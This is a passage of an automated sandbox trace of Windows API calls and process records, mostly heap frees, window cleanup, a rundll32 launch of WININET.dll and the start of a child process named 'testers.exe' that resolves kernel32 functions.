hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4050 | out: hHeap=0xc60000) returned 1 [0256.093] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76590 | out: hHeap=0xc60000) returned 1 [0256.093] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4040 | out: hHeap=0xc60000) returned 1 [0256.093] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76578 | out: hHeap=0xc60000) returned 1 [0256.093] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4030 | out: hHeap=0xc60000) returned 1 [0256.093] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76560 | out: hHeap=0xc60000) returned 1 [0256.093] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4020 | out: hHeap=0xc60000) returned 1 [0256.093] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76548 | out: hHeap=0xc60000) returned 1 [0256.093] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed3ff0 | out: hHeap=0xc60000) returned 1 [0256.093] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed7b20 | out: hHeap=0xc60000) returned 1 [0256.093] KillTimer (hWnd=0x0, uIDEvent=0x7fdb) returned 1 [0256.093] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4110 | out: hHeap=0xc60000) returned 1 [0256.093] NtdllDialogWndProc_W () returned 0x0 [0256.096] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.096] NtdllDialogWndProc_W () returned 0x0 [0256.097] DeleteObject (ho=0x3a1001cb) returned 1 [0256.097] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7afd0 | out: hHeap=0xc60000) returned 1 [0256.097] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b108 | out: hHeap=0xc60000) returned 1 [0256.097] DeleteObject (ho=0x451007ac) returned 1 [0256.097] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b0c0 | out: hHeap=0xc60000) returned 1 [0256.097] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b090 | out: hHeap=0xc60000) returned 1 [0256.097] DeleteObject (ho=0xbe1001e2) returned 1 [0256.097] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76770 | out: hHeap=0xc60000) returned 1 [0256.097] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe764d0 | out: hHeap=0xc60000) returned 1 [0256.097] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0256.097] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78d68 | out: hHeap=0xc60000) returned 1 [0256.097] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0256.097] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe97920 | out: hHeap=0xc60000) returned 1 [0256.097] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c50 | out: hHeap=0xc60000) returned 1 [0256.097] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b228 | out: hHeap=0xc60000) returned 1 [0256.097] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c80 | out: hHeap=0xc60000) returned 1 [0256.097] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe97950 | out: hHeap=0xc60000) returned 1 [0256.098] PostQuitMessage (nExitCode=0) [0256.098] GetMessageW (in: lpMsg=0x87fb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x87fb4c) returned 0 [0256.098] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78b00 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78f08 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69630 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79268 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd695e0 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758b0 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79298 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79280 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd792b0 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd792c8 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd792e0 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69608 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78dd0 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ab8 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd695b8 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78650 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78aa0 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69568 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758a0 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd791f0 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd791d8 | out: hHeap=0xc60000) returned 1 [0256.099] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79208 | out: hHeap=0xc60000) returned 1 [0256.100] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79220 | out: hHeap=0xc60000) returned 1 [0256.100] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69590 | out: hHeap=0xc60000) returned 1 [0256.100] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd694f0 | out: hHeap=0xc60000) returned 1 [0256.100] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75870 | out: hHeap=0xc60000) returned 1 [0256.100] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79130 | out: hHeap=0xc60000) returned 1 [0256.100] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79118 | out: hHeap=0xc60000) returned 1 [0256.100] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79148 | out: hHeap=0xc60000) returned 1 [0256.100] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ad0 | out: hHeap=0xc60000) returned 1 [0256.100] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75880 | out: hHeap=0xc60000) returned 1 [0256.100] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79178 | out: hHeap=0xc60000) returned 1 [0256.100] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79160 | out: hHeap=0xc60000) returned 1 [0256.100] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69540 | out: hHeap=0xc60000) returned 1 [0256.100] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75890 | out: hHeap=0xc60000) returned 1 [0256.100] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd791a8 | out: hHeap=0xc60000) returned 1 [0256.100] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79190 | out: hHeap=0xc60000) returned 1 [0256.101] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd791c0 | out: hHeap=0xc60000) returned 1 [0256.101] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69518 | out: hHeap=0xc60000) returned 1 [0256.101] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd786c8 | out: hHeap=0xc60000) returned 1 [0256.101] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75840 | out: hHeap=0xc60000) returned 1 [0256.101] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79058 | out: hHeap=0xc60000) returned 1 [0256.101] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79040 | out: hHeap=0xc60000) returned 1 [0256.101] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78a88 | out: hHeap=0xc60000) returned 1 [0256.101] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75850 | out: hHeap=0xc60000) returned 1 [0256.101] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79088 | out: hHeap=0xc60000) returned 1 [0256.101] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79070 | out: hHeap=0xc60000) returned 1 [0256.101] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd790a0 | out: hHeap=0xc60000) returned 1 [0256.102] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78b30 | out: hHeap=0xc60000) returned 1 [0256.102] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75860 | out: hHeap=0xc60000) returned 1 [0256.102] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd790d0 | out: hHeap=0xc60000) returned 1 [0256.102] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd790b8 | out: hHeap=0xc60000) returned 1 [0256.102] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd790e8 | out: hHeap=0xc60000) returned 1 [0256.102] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79100 | out: hHeap=0xc60000) returned 1 [0256.102] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd694c8 | out: hHeap=0xc60000) returned 1 [0256.102] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78b48 | out: hHeap=0xc60000) returned 1 [0256.102] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75800 | out: hHeap=0xc60000) returned 1 [0256.102] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78f38 | out: hHeap=0xc60000) returned 1 [0256.102] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78f20 | out: hHeap=0xc60000) returned 1 [0256.102] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e5c0 | out: hHeap=0xc60000) returned 1 [0256.102] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75810 | out: hHeap=0xc60000) returned 1 [0256.102] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78f68 | out: hHeap=0xc60000) returned 1 [0256.102] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78f50 | out: hHeap=0xc60000) returned 1 [0256.104] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78f80 | out: hHeap=0xc60000) returned 1 [0256.104] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd694a0 | out: hHeap=0xc60000) returned 1 [0256.104] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75820 | out: hHeap=0xc60000) returned 1 [0256.104] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78fb0 | out: hHeap=0xc60000) returned 1 [0256.104] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78f98 | out: hHeap=0xc60000) returned 1 [0256.104] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78fc8 | out: hHeap=0xc60000) returned 1 [0256.104] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xce3678 | out: hHeap=0xc60000) returned 1 [0256.104] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75830 | out: hHeap=0xc60000) returned 1 [0256.104] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ff8 | out: hHeap=0xc60000) returned 1 [0256.104] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78fe0 | out: hHeap=0xc60000) returned 1 [0256.104] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79010 | out: hHeap=0xc60000) returned 1 [0256.104] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79028 | out: hHeap=0xc60000) returned 1 [0256.104] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69478 | out: hHeap=0xc60000) returned 1 [0256.104] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78668 | out: hHeap=0xc60000) returned 1 [0256.104] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd757c0 | out: hHeap=0xc60000) returned 1 [0256.104] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78e00 | out: hHeap=0xc60000) returned 1 [0256.105] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78de8 | out: hHeap=0xc60000) returned 1 [0256.105] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e588 | out: hHeap=0xc60000) returned 1 [0256.105] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd757d0 | out: hHeap=0xc60000) returned 1 [0256.105] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78e30 | out: hHeap=0xc60000) returned 1 [0256.105] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78e18 | out: hHeap=0xc60000) returned 1 [0256.105] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78e48 | out: hHeap=0xc60000) returned 1 [0256.105] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69428 | out: hHeap=0xc60000) returned 1 [0256.105] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd757e0 | out: hHeap=0xc60000) returned 1 [0256.105] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78e78 | out: hHeap=0xc60000) returned 1 [0256.105] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78e60 | out: hHeap=0xc60000) returned 1 [0256.105] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78e90 | out: hHeap=0xc60000) returned 1 [0256.105] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e5f8 | out: hHeap=0xc60000) returned 1 [0256.105] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd757f0 | out: hHeap=0xc60000) returned 1 [0256.105] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ec0 | out: hHeap=0xc60000) returned 1 [0256.105] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ea8 | out: hHeap=0xc60000) returned 1 [0256.105] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ed8 | out: hHeap=0xc60000) returned 1 [0256.142] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ef0 | out: hHeap=0xc60000) returned 1 [0256.142] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69450 | out: hHeap=0xc60000) returned 1 [0256.142] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78b18 | out: hHeap=0xc60000) returned 1 [0256.142] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75780 | out: hHeap=0xc60000) returned 1 [0256.143] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd786e0 | out: hHeap=0xc60000) returned 1 [0256.143] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78740 | out: hHeap=0xc60000) returned 1 [0256.143] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e550 | out: hHeap=0xc60000) returned 1 [0256.143] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75790 | out: hHeap=0xc60000) returned 1 [0256.143] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78cf8 | out: hHeap=0xc60000) returned 1 [0256.143] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ce0 | out: hHeap=0xc60000) returned 1 [0256.143] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78d10 | out: hHeap=0xc60000) returned 1 [0256.143] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd693d8 | out: hHeap=0xc60000) returned 1 [0256.143] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd757a0 | out: hHeap=0xc60000) returned 1 [0256.143] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78d40 | out: hHeap=0xc60000) returned 1 [0256.143] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78d28 | out: hHeap=0xc60000) returned 1 [0256.143] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78d58 | out: hHeap=0xc60000) returned 1 [0256.143] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78698 | out: hHeap=0xc60000) returned 1 [0256.145] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd757b0 | out: hHeap=0xc60000) returned 1 [0256.145] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78d88 | out: hHeap=0xc60000) returned 1 [0256.145] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78d70 | out: hHeap=0xc60000) returned 1 [0256.145] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78da0 | out: hHeap=0xc60000) returned 1 [0256.145] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78db8 | out: hHeap=0xc60000) returned 1 [0256.145] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69400 | out: hHeap=0xc60000) returned 1 [0256.145] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78710 | out: hHeap=0xc60000) returned 1 [0256.145] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75740 | out: hHeap=0xc60000) returned 1 [0256.145] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78b78 | out: hHeap=0xc60000) returned 1 [0256.145] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78b60 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78728 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75750 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ba8 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78b90 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78bc0 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78a70 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75760 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78bf0 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78bd8 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78c08 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd693b0 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75770 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78c38 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78c20 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78c50 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78c68 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78c80 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78c98 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78cb0 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78cc8 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e518 | out: hHeap=0xc60000) returned 1 [0256.146] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78638 | out: hHeap=0xc60000) returned 1 [0256.147] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75720 | out: hHeap=0xc60000) returned 1 [0256.147] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78770 | out: hHeap=0xc60000) returned 1 [0256.147] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78758 | out: hHeap=0xc60000) returned 1 [0256.147] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd789c8 | out: hHeap=0xc60000) returned 1 [0256.147] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd789e0 | out: hHeap=0xc60000) returned 1 [0256.147] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd789f8 | out: hHeap=0xc60000) returned 1 [0256.147] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd03848 | out: hHeap=0xc60000) returned 1 [0256.147] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75730 | out: hHeap=0xc60000) returned 1 [0256.147] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78a28 | out: hHeap=0xc60000) returned 1 [0256.151] SetCurrentDirectoryW (lpPathName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 1 [0256.155] mciSendStringW (in: lpstrCommand="close all", lpstrReturnString=0x0, uReturnLength=0x0, hwndCallback=0x0 | out: lpstrReturnString=0x0) returned 0x0 [0256.156] OleUninitialize () Thread: id = 250 os_tid = 0x110 Thread: id = 251 os_tid = 0x3c8 Thread: id = 253 os_tid = 0x6bc Thread: id = 254 os_tid = 0x7d8 Thread: id = 255 os_tid = 0x4a4 Thread: id = 261 os_tid = 0xd0 Thread: id = 262 os_tid = 0xd4 Thread: id = 263 os_tid = 0xd8 Process: id = "36" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x62c42000" os_pid = "0x310" os_integrity_level = "0x1000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "35" os_parent_pid = "0x778" cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\syswow64\\WININET.dll\",DispatchAPICall 1 " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 252 os_tid = 0x57c Thread: id = 256 os_tid = 0x580 Thread: id = 257 os_tid = 0x1c4 Thread: id = 258 os_tid = 0x4f8 Thread: id = 259 os_tid = 0x7dc Thread: id = 260 os_tid = 0xcc Process: id = "37" image_name = "testers.exe" filename = "c:\\progra~2\\common~1\\testers.exe" page_root = "0x60b59000" os_pid = "0x350" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "35" os_parent_pid = "0x778" cmd_line = "C:\\PROGRA~2\\COMMON~1\\testers.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 264 os_tid = 0x330 [0256.378] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7fff40 | out: lpSystemTimeAsFileTime=0x7fff40*(dwLowDateTime=0x3a4d8e10, dwHighDateTime=0x1d661be)) [0256.378] GetCurrentThreadId () returned 0x330 [0256.378] GetCurrentProcessId () returned 0x350 [0256.378] QueryPerformanceCounter (in: lpPerformanceCount=0x7fff38 | out: lpPerformanceCount=0x7fff38*=18690709659) returned 1 [0256.412] GetStartupInfoW (in: lpStartupInfo=0x7ffed0 | out: lpStartupInfo=0x7ffed0*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\PROGRA~2\\COMMON~1\\testers.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7737fd35, hStdError=0x773e7daf)) [0256.412] GetProcessHeap () returned 0xbc0000 [0256.415] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75990000 [0256.416] GetProcAddress (hModule=0x75990000, lpProcName="FlsAlloc") returned 0x759a4f2b [0256.416] GetProcAddress (hModule=0x75990000, lpProcName="FlsFree") returned 0x759a359f [0256.417] GetProcAddress (hModule=0x75990000, lpProcName="FlsGetValue") returned 0x759a1252 [0256.417] GetProcAddress (hModule=0x75990000, lpProcName="FlsSetValue") returned 0x759a4208 [0256.417] GetProcAddress (hModule=0x75990000, lpProcName="InitializeCriticalSectionEx") returned 0x759a4d28 [0256.417] GetProcAddress (hModule=0x75990000, lpProcName="CreateEventExW") returned 0x75a2410b [0256.417] GetProcAddress (hModule=0x75990000, lpProcName="CreateSemaphoreExW") returned 0x75a24195 [0256.417] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadStackGuarantee") returned 0x759ad31f [0256.418] GetProcAddress (hModule=0x75990000, lpProcName="CreateThreadpoolTimer") returned 0x759bee7e [0256.418] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadpoolTimer") returned 0x773a441c [0256.418] GetProcAddress (hModule=0x75990000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x773cc50e [0256.418] GetProcAddress (hModule=0x75990000, lpProcName="CloseThreadpoolTimer") returned 0x773cc381 [0256.418] GetProcAddress (hModule=0x75990000, lpProcName="CreateThreadpoolWait") returned 0x759bf088 [0256.419] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadpoolWait") returned 0x773b05d7 [0256.419] GetProcAddress (hModule=0x75990000, lpProcName="CloseThreadpoolWait") returned 0x773cca24 [0256.419] GetProcAddress (hModule=0x75990000, lpProcName="FlushProcessWriteBuffers") returned 0x77380b8c [0256.419] GetProcAddress (hModule=0x75990000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7743fde8 [0256.419] GetProcAddress (hModule=0x75990000, lpProcName="GetCurrentProcessorNumber") returned 0x773d1e1d [0256.419] GetProcAddress (hModule=0x75990000, lpProcName="GetLogicalProcessorInformation") returned 0x75a24761 